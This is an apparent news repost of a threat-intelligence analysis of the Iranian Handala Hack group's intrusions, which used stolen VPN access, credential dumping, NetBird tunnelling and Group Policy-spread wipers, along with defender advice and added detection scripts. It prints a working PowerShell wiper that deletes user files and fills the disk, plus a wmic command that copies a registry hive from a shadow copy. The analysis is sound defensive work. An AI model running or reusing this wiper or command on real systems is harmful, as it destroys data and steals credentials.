NEWS Iranians hack in a primitive but deadly way: a stolen VPN, admin rights, and four wipers will destroy everything.

pinkman

All about the simple but brutal scheme of the Handala group.
The Iranian group Handala Hack, linked to the Void Manticore cluster and the Iranian Ministry of Intelligence and Security, continues to operate using a rather brutal but simple strategy: gain access, quickly establish a foothold within the network, manually infiltrate the infrastructure, and launch several data destruction methods simultaneously. In a new analysis, researchers described not only the group's familiar set of tactics but also several new details. These include the use of NetBird to establish private tunnels within a compromised environment and a PowerShell wiper with signs of AI-assisted coding.

The Handala Hack identity doesn't represent a single, isolated campaign, but rather one of Void Manticore's public personas. This group also has other well-known personas: Karma and Homeland Justice. Homeland Justice has long been used in operations against Albania, including government agencies and the telecom sector. Handala, on the other hand, was primarily associated with attacks on Israeli organizations, but its geography is no longer limited to Israel. Researchers also specifically mention attacks on American companies, including the medical technology manufacturer Stryker.

According to the report, the group's techniques, tactics, and procedures—or TTPs—remained largely unchanged from 2024 to 2026. Void Manticore continues to rely on manual network manipulation, commercial and publicly available tools, ready-made wipers, publicly available file deletion and encryption utilities, and criminal services for initial access and acquisition of malicious tools. The key point here is that even without particularly exotic tactics, the group achieves significant disruption because it acts quickly, leverages privileged accounts, and attacks across multiple fronts.

Researchers believe that the Handala, Karma, and Homeland Justice actors are closely linked. Incidents attributed to these fronts shared not only common techniques but also sections of code in the wipers used. Karma and Homeland Justice also showed evidence of cooperation with another Iranian cluster, Scarred Manticore. In some cases, the pattern was particularly telling: messages within the infected environment and inscriptions left by the attackers pointed to Karma, and the stolen data was ultimately leaked through Handala. The authors suggest that Karma and Handala may have initially been two separate teams or two branches within a single organization, and then effectively merged under the more visible Handala brand. Karma's disappearance from the public eye and Handala's dominance in more recent operations indirectly support this.

According to publicly available data, Void Manticore overlaps with activity associated with the MOIS's internal security unit, specifically the counterterrorism unit led by Seyed Yahya Hosseini Panjaki. Researchers note that Panjaki, according to publicly available reports, died during the initial phase of Israeli strikes on Iran in early March 2026. This detail doesn't directly change the attack technique itself, but it helps better situate the cluster within the broader Iranian context.

Handala's initial access, according to the authors, often revolves around contractors, IT companies, and service providers. The logic is simple: through such an intermediary, it's possible to access multiple networks simultaneously. The group has long been hunting for credentials and is particularly active in exploiting compromised VPN accounts. In recent months, researchers have observed hundreds of login and password attempts against organizational VPN infrastructure, which they linked to Handala's infrastructure. These connections often went through commercial VPN nodes, and the source regularly used default Windows machine names like DESKTOP-XXXXXX or WIN-XXXXXX.

After the January internet shutdown in Iran, the picture changed slightly. Researchers observed similar activity from IP addresses attributed to Starlink, and note that this pattern persisted. At the same time, the group's operational discipline declined. While operators previously tried to hide traffic behind commercial VPNs and conceal its direct origin, more recent incidents began to feature direct connections from Iranian IP addresses. Previously, when the group went after Israeli targets, it typically accessed the internet through the 169.150.227.X segment. Sometimes this obfuscation broke, and connections were still visible, either from Iranian addresses or from VPSs. After the war began, the researchers believe that maintaining this level of obfuscation became more difficult. In some cases, the attackers managed to exit through the Israeli node 146.185.219[.]235, which, according to the authors, was also connected to a VPN service, although it no longer coincided with the previous infrastructure.

A separate scenario is described in which network access, presumably used later in the destructive phase, emerged months before the actual attack. Researchers believe this early access allowed the attackers to gain a foothold, harvest the necessary credentials, and, most importantly, reach the Domain Admin level, that is, the Active Directory domain administrator. In the final hours before the destructive phase, Handala, according to their estimates, verified access functionality and tested authentication with the already stolen credentials.

Some of the pre-strike activity deviated slightly from the group's usual signature, so the authors cautiously note that not all steps can be attributed with complete certainty to Handala. However, this chain included actions typical of attack preparation: disabling Windows Defender protections, performing reconnaissance within the environment, stealing credentials, and attempting to retrieve additional payload from a separate command-and-control server at 107.189.19[.]52.

The attackers then moved on to extracting credentials using several methods. The report mentions a dump of the LSASS process via comsvcs.dll using rundll32.exe. LSASS is a Windows system process whose memory can contain credentials and other data useful for further network traversal. At the same time, the attackers exported sensitive registry keys, including HKLM. ADRecon was also launched under the name dra.ps1 within the infrastructure. This is a PowerShell framework for reconnaissance in Active Directory environments: it can be used to gather information about users, groups, trust relationships, computers, and administrator roles. It was at this stage, according to the researchers, that the attackers likely obtained Domain Admin privileges, which they then used in the Handala wipe operation.

The report also includes one of the observed command fragments used to copy data from the shadow copy of the disk:

```
wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"
```
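The credential-access steps described above (an LSASS dump through comsvcs.dll, remote process creation via wmic to copy a registry hive out of a shadow copy, hive exports, and ADRecon running as dra.ps1) all leave distinctive command lines in process-creation telemetry. The following Python is an added detection example, not code from the report or from the researchers; the event records are constructed to resemble Sysmon process-creation events (host, image, command line), the hostnames and paths are placeholders, and the rule names are my own. It scores a host higher when several distinct rules fire there, which is what separates the chain seen in this incident from a single noisy hit.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1-like shape.
# Sample data built for this example; hostnames and paths are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"host": "WS-0421", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Users\Public\out.dmp full"},
    {"host": "WS-0421", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": r'wmic.exe /node:FILESRV01 /user:corp\svc_admin /password:*** process call create '
                r'"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"'},
    {"host": "WS-0421", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe save HKLM\SAM C:\Users\Public\sam.hiv"},
    {"host": "DC01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\dra.ps1"},
    # Two benign events so the rules can be seen not firing on ordinary rundll32/reg usage.
    {"host": "WS-0099", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"host": "WS-0100", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
]

# Each rule is (name, compiled regex over the command line). Names are my own labels.
RULES = [
    ("lsass_dump_comsvcs", re.compile(r"comsvcs\.dll.*MiniDump", re.I)),
    ("shadowcopy_hive_copy", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\config\\(system|sam|security)", re.I)),
    ("registry_hive_save", re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b", re.I)),
    ("adrecon_script", re.compile(r"\\dra\.ps1\b", re.I)),
    ("wmic_remote_create", re.compile(r"wmic(\.exe)?\s+/node:.*process\s+call\s+create", re.I)),
]


def match_rules(event):
    """Names of all rules whose regex matches this event's command line."""
    return [name for name, rx in RULES if rx.search(event["cmdline"])]


def detect(events):
    """Flat list of (host, rule_name, cmdline) for every rule hit across the events."""
    hits = []
    for ev in events:
        for name in match_rules(ev):
            hits.append((ev["host"], name, ev["cmdline"]))
    return hits


def hosts_with_credential_access_chain(events, min_distinct_rules=2):
    """Hosts on which at least `min_distinct_rules` different rules fired.

    One hit can be an admin doing something unusual; several distinct
    credential-access techniques on one host in the same window is the
    pattern described for this intrusion and deserves an immediate look.
    """
    per_host = {}
    for host, name, _ in detect(events):
        per_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= min_distinct_rules)


if __name__ == "__main__":
    for host, name, cmd in detect(SAMPLE_EVENTS):
        print(f"{host:8} {name:24} {cmd[:70]}")
    print("escalate:", hosts_with_credential_access_chain(SAMPLE_EVENTS))
```

On the constructed sample, four of the five rules fire on WS-0421 and only the ADRecon rule fires on DC01, so the chain check returns WS-0421 alone; in practice the same regexes map directly onto a SIEM query over the process-creation command-line field.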
After gaining access and privileges, the group moved laterally across the network. Here, according to researchers, Handala still works primarily manually. The primary tool for moving between systems is RDP, or the standard Remote Desktop Protocol. Through it, operators log into compromised hosts and navigate the environment almost like a regular administrator. But if the desired machines couldn't be directly accessed from the outside, a more sophisticated tool—NetBird—came into play.

NetBird is a legitimate platform for building secure private mesh networks using a zero-trust model. Simply put, it connects machines so that access between them goes through an encrypted tunnel and does not depend on the machines being directly reachable from one another. This is very convenient for an attacker: if one machine is already under their control, they can use this tool to extend their own private network and reach other nodes. In this case, NetBird was installed manually. Operators connected to compromised systems via RDP, opened the default browser, and downloaded the client directly from the official NetBird website. After installing it on several machines within the network, they gained additional internal connectivity and were able to act more quickly. In one incident, researchers observed at least five different machines controlled by the attackers simultaneously operating within the environment.

The destructive phase was particularly brutal. To inflict maximum damage, the group deployed four different wipe techniques in parallel. This duplication isn't just for show. If one method doesn't work consistently or is partially stopped, the other will continue to destroy data. To distribute the different wipers across the network, the attackers used Group Policy, or Active Directory group policies. This is a very powerful tool in a corporate Windows environment: it allows for centralized distribution of scripts and tasks to multiple machines simultaneously.

The researchers dubbed the first component "Handala Wiper." In some cases, the file appeared as handala.exe. The wiper was distributed via a scheduled task created using logon scripts in Group Policy. The handala.bat script launched two components: an executable file and a PowerShell script. The researchers emphasized an interesting detail: the executable itself was launched remotely from the domain controller and was not written to the disk of the affected machines. This technique helps complicate detection and post-incident analysis. Inside the system, the malicious code overwrote file contents and also used wiping techniques via the master boot record (MBR). Damage to the MBR can render the system not only unusable but also significantly complicate recovery.

In the final stage, the operators launched another custom component—a PowerShell wiper. It was also distributed via Group Policy logon scripts and could therefore quickly spread across multiple machines. Its logic is simple but highly destructive: the script recursively enumerates files within user directories and deletes them. Researchers believe that, judging by the code structure and detailed comments, this PowerShell script was likely written using AI. Finally, the script also distributed the handala.gif image across logical drives to leave a visible visual signature of the attack.

Below is the full PowerShell code snippet that the researchers included in the report:

```powershell
$usersFolder = "C:\Users"

# Ensure the folder exists
if (Test-Path $usersFolder) {
    # Get all items in C:\Users, but not the Users folder itself
    $items = Get-ChildItem -Path $usersFolder -Recurse

    # Remove each item (files and subfolders) inside C:\Users
    foreach ($item in $items) {
        try {
            Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
        } catch {
            Write-Host "Could not delete: $($item.FullName)"
        }
    }
}

$sourceFile = "\\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar"
$destinationFolder = "C:\users"

if (!(Test-Path $destinationFolder)) {
    New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}

$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')

$i = 0

while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
    Copy-Item $sourceFile "$destinationFolder\Handala_$i.gif"
    $i++
}
```
In addition to their own wipers, the group also used legitimate software: VeraCrypt. VeraCrypt is typically known as a disk and container encryption tool used to protect data. In the Handala attack, it was used as an additional layer of destruction. The operator connected to the host via RDP, downloaded VeraCrypt from the official website through the default browser, and then encrypted the system drives. This is especially frustrating for the victim: even if some wipers fail to complete their work or are stopped somewhere, the encrypted drives may still remain inaccessible, greatly complicating recovery.

In some cases, the group didn't bother with the details at all and deleted data manually. Researchers observed instances where operators logged into machines via RDP, selected files, and simply deleted them. Similarly, they deleted virtual machines directly from the virtualization platform. This technique seems primitive, but given the privileges already gained and good control over the environment, it's quite effective. Moreover, the researchers observed similar behavior not only in the incidents themselves, but also in videos and leaked materials published by Handala itself.

The overall conclusion of the report is quite straightforward. Handala and the associated Void Manticore cluster don't rely on rare, high-tech tricks. Their model relies on fairly simple but effective steps: stolen credentials, rapid network entry, manual movement through the infrastructure, tunneling through legitimate tools, group policies for mass distribution, and several parallel data destruction methods. This is why defense against such operations remains largely classical: the more securely the basic access paths are closed and the sooner manual activity within the network is detected, the less likely the attackers are to reach the destructive phase.

In their recommendations for defenders, the researchers primarily advise enabling multifactor authentication, especially for remote access and privileged accounts. Special attention should be paid to anomalous authentication: logins from countries where the organization has not previously operated, first logins at unusual times, chains of multiple failed attempts followed by successful logins, new device registrations, unusual data transfer volumes during VPN sessions, and authentication via new ASNs or hosting providers.

The authors also recommend restricting access from high-risk geographies and infrastructures. The report specifically recommends blocking incoming connections from Iran at the perimeter and on remote access services, unless there is a proven business need. Similar advice applies to Starlink address ranges, which, according to the researchers, were already being used by Iranian operators. If complete blocking is not possible, they recommend at least enabling conditional access, strengthening authentication requirements, and separately monitoring such ranges.

Another important set of recommendations concerns RDP. It is recommended to limit it as much as possible, strengthen its security, and disable it wherever it is not truly needed. It is especially useful to search for RDP connections from machines that retain standard Windows names like DESKTOP-XXXXXX or WIN-XXXXXXXX, especially if such sessions are initiated outside of working hours. Finally, it is worth monitoring the use of potentially unwanted software: remote administration and monitoring systems, VPN clients like NetBird, and tunneling utilities, including SSH for Windows.
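The authentication-monitoring advice in the preceding paragraphs (failed-then-successful login chains, logins from ASNs never seen before, sessions outside working hours, and clients still carrying default DESKTOP-/WIN- hostnames) can be expressed as a single pass over VPN and RDP authentication records. The Python below is an added example and not code from the report; the log lines, IP addresses and ASN labels are constructed placeholders, the 07:00 to 19:00 working window and the three-failure threshold are assumptions chosen for the example, and the baseline of known ASNs would in practice be learned from the organization's own history.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed VPN/RDP authentication events: timestamp user source_ip client_hostname asn_label result.
# Sample data built for this example; the IPs are documentation ranges and the ASN labels are placeholders.
SAMPLE_LOG = """\
2026-03-10T02:11:05 jsmith 198.51.100.23 DESKTOP-8K2J1QA AS-PLACEHOLDER-HOSTING FAIL
2026-03-10T02:11:19 jsmith 198.51.100.23 DESKTOP-8K2J1QA AS-PLACEHOLDER-HOSTING FAIL
2026-03-10T02:11:33 jsmith 198.51.100.23 DESKTOP-8K2J1QA AS-PLACEHOLDER-HOSTING FAIL
2026-03-10T02:12:02 jsmith 198.51.100.23 DESKTOP-8K2J1QA AS-PLACEHOLDER-HOSTING SUCCESS
2026-03-10T09:30:10 mlee 203.0.113.8 CORP-LT-0412 AS-PLACEHOLDER-ISP SUCCESS
2026-03-10T23:45:00 svc_backup 192.0.2.77 WIN-QX9T1B2CD4E AS-PLACEHOLDER-SAT SUCCESS
"""

# Assumed baseline: ASNs the organization has seen its users authenticate from before.
KNOWN_ASNS = {"AS-PLACEHOLDER-ISP"}

# Default Windows machine names: DESKTOP-<7 chars> or WIN-<up to 11 chars> of letters/digits.
DEFAULT_HOSTNAME = re.compile(r"^(DESKTOP|WIN)-[A-Z0-9]{6,11}$")

# Assumed local working hours for the example (start inclusive, end exclusive).
WORK_START, WORK_END = 7, 19


def parse(log_text):
    """Turn the whitespace-separated sample format into event dicts, in file order."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, host, asn, result = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "user": user, "ip": ip,
                       "host": host, "asn": asn, "ok": result == "SUCCESS"})
    return events


def analyze(log_text, known_asns, fail_threshold=3, window=timedelta(minutes=10)):
    """Return [(timestamp, user, [reasons])] for each successful login that trips a rule.

    Failures are tracked per (user, source IP) in a sliding window so that a
    success following a burst of failures is flagged; the other three checks
    look only at the successful event itself.
    """
    alerts = []
    recent_fails = defaultdict(deque)  # (user, ip) -> timestamps of failures inside the window
    for ev in parse(log_text):
        key = (ev["user"], ev["ip"])
        fails = recent_fails[key]
        while fails and ev["ts"] - fails[0] > window:  # expire failures older than the window
            fails.popleft()
        if not ev["ok"]:
            fails.append(ev["ts"])
            continue
        reasons = []
        if len(fails) >= fail_threshold:
            reasons.append(f"success_after_{len(fails)}_failures")
        if DEFAULT_HOSTNAME.match(ev["host"]):
            reasons.append("default_windows_hostname")
        if not (WORK_START <= ev["ts"].hour < WORK_END):
            reasons.append("outside_working_hours")
        if ev["asn"] not in known_asns:
            reasons.append("unseen_asn")
        fails.clear()  # the burst ended in a success; start counting afresh
        if reasons:
            alerts.append((ev["ts"].isoformat(), ev["user"], reasons))
    return alerts


if __name__ == "__main__":
    for ts, user, reasons in analyze(SAMPLE_LOG, KNOWN_ASNS):
        print(ts, user, ", ".join(reasons))
```

On the sample, the jsmith login trips all four rules at once, mlee's daytime login from a known ASN and a corporate hostname produces nothing, and the late-night svc_backup session from an unseen ASN on a WIN- default hostname is flagged on three counts; each reason string is meant to become a separate field in the resulting alert so the triage analyst sees why it fired.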

The Handala story illustrates an unpleasant but important point: a major disruptive incident doesn't always require a sophisticated, next-generation implant. Sometimes, stolen VPN access, domain administrator privileges, a remote desktop, a couple of legitimate utilities, and a group of operators willing to quickly traverse the network manually are all that's needed. This is precisely why such campaigns are dangerous not only for high-profile political targets but also for ordinary companies whose basic remote access and internal administration practices are still based on old assumptions.
 
Top Bottom